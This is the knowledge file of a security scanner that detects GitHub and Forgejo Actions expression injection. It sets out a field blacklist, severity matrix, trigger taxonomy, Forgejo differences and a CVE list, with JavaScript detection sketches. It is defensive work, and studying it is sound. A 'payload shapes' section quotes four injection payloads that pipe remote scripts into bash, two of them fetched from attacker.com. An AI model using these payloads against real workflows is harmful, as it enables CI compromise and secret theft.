ktg-plugin-marketplace/plugins/llm-security/knowledge/workflow-injection-patterns.md
Kjell Tore Guttormsen c31d4b1718 feat(workflow-scanner): E11 part 1 — core file-walk + 23-field blacklist + sink-restriction
Adds a deterministic GitHub Actions / Forgejo Actions injection
scanner. Detects ${{ <dangerous-field> }} interpolations inside
`run:` step blocks under privileged or semi-privileged triggers.
Sink-restricted: `if:` / `with:` / `env:` (block-level) are
evaluated by the runner expression engine, not the shell, so they
are NOT injection sinks and are suppressed at parser level.

Why: workflow expression injection is the most prevalent SAST class
on GitHub (CodeQL preview: 800K+ findings across 158K repos). The
graduated severity matrix (HIGH for pull_request_target / discussion
/ workflow_run; MEDIUM for pull_request / workflow_dispatch) is the
community-converged calibration target — uniform HIGH causes alert
fatigue.

Components:
- scanners/lib/workflow-yaml-state.mjs — line-based YAML state
  machine. Tracks indentation, parent-context stack, and
  `run: |` / `run: >` block-scalar entry/exit. Zero deps.
- scanners/workflow-scanner.mjs — discoverWorkflows() probes
  .github/workflows/ and .forgejo/workflows/ directly (file-discovery
  has no glob include). 23-field blacklist (GHSL 17 + 6 GlueStack-
  class additions). Platform encoded via file path; no schema
  extension to finding(). Forgejo-specific: workflow_run advisory
  emitted to stderr; recommendation text mentions Forgejo's
  server-level token scoping (job-level permissions: is ignored).
- knowledge/workflow-injection-patterns.md — 23-field blacklist,
  trigger taxonomy, severity matrix, Forgejo divergences, NVD CVE
  corpus.

Tests (47 new):
- tests/lib/workflow-yaml-state.test.mjs (15): trigger forms
  (string / inline-list / block-list / block-mapping), single-line
  run, block-scalar | and > tracking, env/with sink-mismatch,
  multi-line, comment stripping, line-number accuracy.
- tests/scanners/workflow-scanner.test.mjs (14): TP head_ref
  pull_request_target, TP discussion.title gluestack pattern,
  TP comment.body pull_request, TP issue.body block-scalar,
  FP if-context, FP env-block, INFO numeric, Forgejo TP, Forgejo
  workflow_run advisory, envelope shape, WFL prefix.
- 9 fixtures in tests/fixtures/workflows/{.github,.forgejo}/workflows/.

Out of scope (B4 / Batch D):
- Re-interpolation detection (env.VAR after env: from blacklisted source)
- github.actor authorization-bypass category
- WFL prefix in severity.mjs OWASP maps + scan-orchestrator
  registration (B4)
- Composite-action input tracing, GITHUB_ENV poisoning (Batch D)

Test count: 1685 → 1732 (+47). Pre-compact-scan flake unchanged
(passes in isolation).
2026-04-30 15:48:48 +02:00


# Workflow Injection Patterns (E11)
Knowledge file for `scanners/workflow-scanner.mjs`. Covers GitHub
Actions and Forgejo Actions `${{ <expr> }}` injection sinks inside
`run:` step blocks. Sourced from
`.claude/projects/2026-04-29-batch-c-scope-finalize/research/01-github-forgejo-actions-injection.md`
(confidence 0.92, 51 sources).
## Canonical 23-field blacklist
The community has converged on a blacklist (zizmor #1878) rather than a
whitelist of safe fields. The 23 fields below are the v7.3.0 baseline —
GitHub Security Lab's canonical 17-field list plus 6 GlueStack-class
additions. All patterns match both `github.*` and `forgejo.*` prefixes
(Forgejo aliases `github.*` to `forgejo.*` per its Reference docs).
### GHSL canonical 17
```
github.event.issue.title
github.event.issue.body
github.event.pull_request.title
github.event.pull_request.body
github.event.pull_request.head.ref
github.event.pull_request.head.label
github.event.pull_request.head.repo.default_branch
github.event.comment.body
github.event.review.body
github.event.commits.*.message
github.event.commits.*.author.email
github.event.commits.*.author.name
github.event.head_commit.message
github.event.head_commit.author.email
github.event.head_commit.author.name
github.event.pages.*.page_name
github.head_ref
```
### GlueStack-class additions (v7.3.0)
```
github.event.discussion.title # CVE-2025-53104
github.event.discussion.body # CVE-2025-53104
github.event.discussion.user.login # CVE-2025-53104
github.event.inputs.* # workflow_dispatch — string inputs only
github.event.client_payload.* # repository_dispatch
inputs.* # bare `inputs.<name>` (action-side / reusable workflow)
```
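A minimal sketch of how the 23 entries above could be compiled into matchers that accept both the `github.*` and `forgejo.*` prefixes. The names `BLACKLIST`, `toRegExp`, and `isBlacklisted` are hypothetical and not taken from `scanners/workflow-scanner.mjs`. The wildcard semantics are also an assumption: a `*` in the middle matches one path segment, and a trailing `*` matches the rest of the path.

```javascript
// Hypothetical sketch; identifiers are illustrative, not the scanner's API.
const BLACKLIST = [
  // GHSL canonical 17
  'github.event.issue.title',
  'github.event.issue.body',
  'github.event.pull_request.title',
  'github.event.pull_request.body',
  'github.event.pull_request.head.ref',
  'github.event.pull_request.head.label',
  'github.event.pull_request.head.repo.default_branch',
  'github.event.comment.body',
  'github.event.review.body',
  'github.event.commits.*.message',
  'github.event.commits.*.author.email',
  'github.event.commits.*.author.name',
  'github.event.head_commit.message',
  'github.event.head_commit.author.email',
  'github.event.head_commit.author.name',
  'github.event.pages.*.page_name',
  'github.head_ref',
  // GlueStack-class additions
  'github.event.discussion.title',
  'github.event.discussion.body',
  'github.event.discussion.user.login',
  'github.event.inputs.*',
  'github.event.client_payload.*',
  'inputs.*',
];

// Compile one blacklist entry into an anchored RegExp.
function toRegExp(pattern) {
  const segments = pattern.split('.');
  const body = segments
    .map((seg, i) => {
      if (seg === '*') {
        // Assumption: trailing `*` spans the remaining path, inner `*` one segment.
        return i === segments.length - 1 ? '\\S+' : '[^.\\s]+';
      }
      // The leading context name may be `github` or its Forgejo counterpart.
      if (i === 0 && seg === 'github') return '(?:github|forgejo)';
      return seg.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
    })
    .join('\\.');
  return new RegExp(`^${body}$`);
}

const BLACKLIST_RES = BLACKLIST.map(toRegExp);

// `expr` is the text found between `${{` and `}}`.
function isBlacklisted(expr) {
  const field = expr.trim();
  return BLACKLIST_RES.some((re) => re.test(field));
}
```

With these assumptions, `isBlacklisted(' forgejo.event.issue.title ')` and `isBlacklisted('inputs.version')` are both true, while `isBlacklisted('github.event.pull_request.number')` is false.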
## Severity matrix
| Tier | Field class | Trigger context | Severity |
|------|-------------|-----------------|----------|
| Privileged trigger | dangerous | `pull_request_target`, `issue_comment`, `discussion`, `discussion_comment`, `workflow_run` | HIGH |
| Semi-privileged trigger | dangerous | `pull_request`, `workflow_dispatch`, `repository_dispatch` | MEDIUM |
| Other / no trigger info | dangerous | (default fallback) | MEDIUM |
| Numeric / hex / fixed-string | safe | any | INFO (suppressed in summary) |
| Sink mismatch | (any) | `if:`, `with:`, `env:` (block-level), `name:`, `runs-on:`, `timeout-minutes:` | NOT injection — suppressed at parser level |
### Safe fields (INFO-only, never injection sinks)
```
github.event.pull_request.number # integer
github.event.pull_request.head.sha # 40-char hex
github.run_id # server-assigned int
github.run_number # int
github.sha # 40-char hex
github.event.action # fixed string ("opened" / "closed" / …)
github.event.repository.full_name # admin-controlled
```
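The matrix and the safe-field list can be read as a small decision function. The sketch below is one possible encoding, not the scanner's implementation. `classifyFinding` and its return shape are hypothetical. It assumes the sink-mismatch row has already been filtered out by the parser, that the field is already known to be either safe or blacklisted, and that a workflow with several triggers takes the highest applicable tier.

```javascript
// Hypothetical sketch of the severity matrix; not the scanner's actual code.
const PRIVILEGED = new Set([
  'pull_request_target',
  'issue_comment',
  'discussion',
  'discussion_comment',
  'workflow_run',
]);

const SEMI_PRIVILEGED = new Set([
  'pull_request',
  'workflow_dispatch',
  'repository_dispatch',
]);

const SAFE_FIELDS = new Set([
  'github.event.pull_request.number',
  'github.event.pull_request.head.sha',
  'github.run_id',
  'github.run_number',
  'github.sha',
  'github.event.action',
  'github.event.repository.full_name',
]);

// `field` is the expression text, `triggers` the list of names under `on:`.
function classifyFinding(field, triggers) {
  // Treat the Forgejo prefix as equivalent to `github.` for lookup purposes.
  const normalized = field.trim().replace(/^forgejo\./, 'github.');
  if (SAFE_FIELDS.has(normalized)) {
    return { tier: 'safe', severity: 'INFO' };
  }
  // Assumption: with several triggers, the most privileged one decides.
  if (triggers.some((t) => PRIVILEGED.has(t))) {
    return { tier: 'privileged', severity: 'HIGH' };
  }
  if (triggers.some((t) => SEMI_PRIVILEGED.has(t))) {
    return { tier: 'semi-privileged', severity: 'MEDIUM' };
  }
  // Default fallback row: unknown or missing trigger information.
  return { tier: 'other', severity: 'MEDIUM' };
}
```

Under these assumptions, `classifyFinding('github.head_ref', ['pull_request', 'pull_request_target'])` yields HIGH, and `classifyFinding('github.sha', ['pull_request_target'])` yields INFO.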
## Trigger taxonomy
### Privileged (HIGH-severity matrix)
- `pull_request_target` — runs on the BASE repo, has write tokens. The
canonical "pwn-request" trigger.
- `issue_comment` — fires on any new issue/PR comment. Attacker-supplied
`comment.body` is shell-injectable.
- `discussion` and `discussion_comment` — same shape as `issue_comment`,
but the Discussion fields evade older zizmor whitelists. CVE-2025-53104
(gluestack) used `${{ github.event.discussion.title }}`.
- `workflow_run` — chained workflow trigger. Inherits BASE repo
privileges. NOT documented for Forgejo Actions; Forgejo scans treat
it as privileged for severity but emit a stderr advisory.
### Semi-privileged (MEDIUM-severity matrix)
- `pull_request` — read-only token from forks; still injectable, just
less catastrophic.
- `workflow_dispatch` — manual trigger with string `inputs.*`; CVE-2026-35580
(NSA Emissary) used this.
- `repository_dispatch` — webhook-driven trigger with `client_payload.*`.
## Sink restriction
Only `run:` step content (single-line or block-scalar `|` / `>`) is a
shell injection sink. In the following contexts the runner expression
engine, not the shell, evaluates the expression:
- `if:` — boolean evaluation, no shell. (actionlint #443.)
- `with:` — passed to action input; downstream action's responsibility.
- `env:` (any level) — bound to env var; safe IF consumed via `$VAR` in
the run script. Re-interpolation `${{ env.VAR }}` inside `run:`
cancels the mitigation (Appsmith CVE GHSL-2024-277).

The scanner suppresses findings whose parent is one of these contexts.
The re-interpolation pattern is detected separately in B4.
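
The sink restriction can be illustrated with a reduced line-based pass. This is a simplified sketch and not the state machine in `scanners/lib/workflow-yaml-state.mjs`: it tracks only `run:` lines and block-scalar entry and exit by indentation, and it does not keep a parent-context stack or strip comments. The name `findRunSinks` and the shape of the returned objects are hypothetical.

```javascript
// Hypothetical sketch: report `${{ ... }}` expressions that sit in `run:` content.
const EXPRESSION = /\$\{\{\s*(.*?)\s*\}\}/g;

function findRunSinks(yamlText) {
  const findings = [];
  let blockIndent = null; // column of the `run:` key while inside `|` or `>`

  const collect = (text, lineNumber) => {
    for (const m of text.matchAll(EXPRESSION)) {
      findings.push({ line: lineNumber, expr: m[1] });
    }
  };

  yamlText.split('\n').forEach((line, index) => {
    const lineNumber = index + 1;
    const indent = line.search(/\S/);
    if (indent === -1) return; // blank lines never close a block scalar

    if (blockIndent !== null) {
      if (indent > blockIndent) {
        collect(line, lineNumber); // still inside the block scalar
        return;
      }
      blockIndent = null; // dedent closes the block; re-examine this line
    }

    // Only a `run:` key opens a sink. Keys such as `if:`, `with:`, `env:`,
    // and `name:` never match here, so their expressions are ignored.
    const m = /^\s*(?:-\s+)?run:\s*(.*)$/.exec(line);
    if (!m) return;

    if (/^[|>][+-]?\d*\s*$/.test(m[1])) {
      blockIndent = line.indexOf('run:'); // block scalar starts on the next line
    } else {
      collect(m[1], lineNumber); // single-line run
    }
  });

  return findings;
}
```

Given a step that uses the same field in `if:`, `env:`, and `run:`, only the `run:` occurrence is returned, which mirrors the suppression described above.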
## Forgejo divergences
| Item | GitHub | Forgejo | Scanner implication |
|------|--------|---------|---------------------|
| Primary context | `github.*` | `forgejo.*` (alias `github.*`) | Match both prefixes |
| Job-level `permissions:` | Enforced | **Ignored** | Recommendation text mentions Forgejo's server-level token scoping instead |
| `workflow_run` trigger | Supported | **Likely unsupported** | Stderr advisory emitted; severity logic still applies |
| OIDC | `permissions: id-token: write` | `enable-openid-connect` | Out of scope for E11 |

The scanner detects the platform from the file path (`.forgejo/workflows/`
→ forgejo, `.github/workflows/` → github). Both directories are scanned
independently when both exist; there is no fallback from one to the
other. This is a documented design choice: the v7.3.0 plan locked it in
to avoid over-confident mitigation guidance for Forgejo.
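
Path-based platform detection might look like the sketch below. `detectPlatform` is a hypothetical name, and the restriction to `.yml` / `.yaml` files directly inside the workflows directory is an assumption rather than documented scanner behavior.

```javascript
// Hypothetical sketch: derive the platform from the workflow file path.
function detectPlatform(filePath) {
  const normalized = filePath.replace(/\\/g, '/'); // tolerate Windows separators
  if (/(^|\/)\.forgejo\/workflows\/[^/]+\.ya?ml$/.test(normalized)) return 'forgejo';
  if (/(^|\/)\.github\/workflows\/[^/]+\.ya?ml$/.test(normalized)) return 'github';
  return null; // not a workflow file; no fallback between platforms
}
```

A caller could use the result to choose the recommendation text, for example mentioning server-level token scoping only when the platform is `forgejo`.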
## Real-world payload shapes (v7.3.0 reference)
- **`${IFS}` brace-expansion** (Ultralytics CVE-2024):
`openimbot:$({curl,-sSfL,raw...}${IFS}|${IFS}bash)`
- **Quote-break + curl** (ultralytics GHSA-7x29-qqmq-v6qc):
`Hacked";{curl,-sSfL,gist...}${IFS}|${IFS}bash`
- **Discussion title `$()` substitution** (gluestack CVE-2025-53104):
`$(curl -sSfL attacker.com/exfil.sh | bash)`
- **`workflow_dispatch` shell-break** (Emissary CVE-2026-35580):
`1.0.0"; curl attacker.com/backdoor.sh | bash; echo "`

Single-quote shell escaping provides ZERO protection: template
substitution happens BEFORE shell parsing (Ken Muse, Appsmith CVE).
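
To make the ordering concrete, the sketch below imitates template substitution with a plain string replace and shows what the shell would then receive. `renderRunStep` and `lookup` are hypothetical stand-ins and far simpler than the real runner expression engine. The payload is a shortened, harmless variant of the quote-break shapes listed above.

```javascript
// Hypothetical stand-in for the runner's `${{ ... }}` substitution.
function lookup(context, path) {
  return path
    .split('.')
    .reduce((obj, key) => (obj == null ? undefined : obj[key]), context);
}

function renderRunStep(template, context) {
  return template.replace(/\$\{\{\s*([\w.]+)\s*\}\}/g, (match, path) => {
    const value = lookup(context, path);
    return value == null ? '' : String(value);
  });
}

// Attacker-controlled issue title that closes the single quote.
const context = {
  github: { event: { issue: { title: "x'; id; echo '" } } },
};

// Unsafe: the expression is pasted into the script text before any shell runs.
const unsafeScript = renderRunStep(
  "echo '${{ github.event.issue.title }}'",
  context
);
// unsafeScript === "echo 'x'; id; echo ''"  (three shell commands)

// Safer: the script only references an env var, so there is nothing to
// substitute and the shell expands "$TITLE" as data at run time.
const saferScript = renderRunStep('echo "$TITLE"', context);
// saferScript === 'echo "$TITLE"'
```

The second form corresponds to binding the value under `env:` and consuming it via `$VAR`, which is the mitigation noted in the sink-restriction section.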
## Confirmed CVE corpus (NVD / vendor-confirmed)
- CVE-2023-49291 — tj-actions/branch-names ≤7.0.6 (CRITICAL 9.3)
- CVE-2025-30066 — tj-actions/changed-files (HIGH 8.6, **CISA KEV**)
- CVE-2025-30154 — reviewdog/action-setup v1 (HIGH 8.6, **CISA KEV**)
- CVE-2025-53104 — gluestack-ui (CRITICAL 9.1, Discussion vector)
- CVE-2025-61671 — Microsoft Symphony (CRITICAL 9.3)
- CVE-2026-33475 — langflow-ai/langflow (CRITICAL 9.1)
- CVE-2026-35580 — NSA Emissary (CRITICAL 9.x, April 2026)
- CVE-2026-3854 — GitHub.com / GHES ≤3.19.2 platform-level (HIGH 8.7)

The April 2026 `elementary-data` PyPI compromise (Gemini second opinion)
is on a watch-list pending NVD/StepSecurity confirmation.
## Out of scope (deferred to Batch D / v8.0.0)
- Composite-action input tracing
- Reusable-workflow call analysis
- `GITHUB_ENV` poisoning detection (LegitSecurity, CodeQL `actions-envvar-injection-critical`)
- Zombie-workflow scanning across non-default branches
- IssueOps TOCTOU (SHA at comment time vs review time)
- Authorization-bypass class for `github.actor` checks (Synacktiv 2023
Dependabot spoofing) — added in B4 as a separate finding category.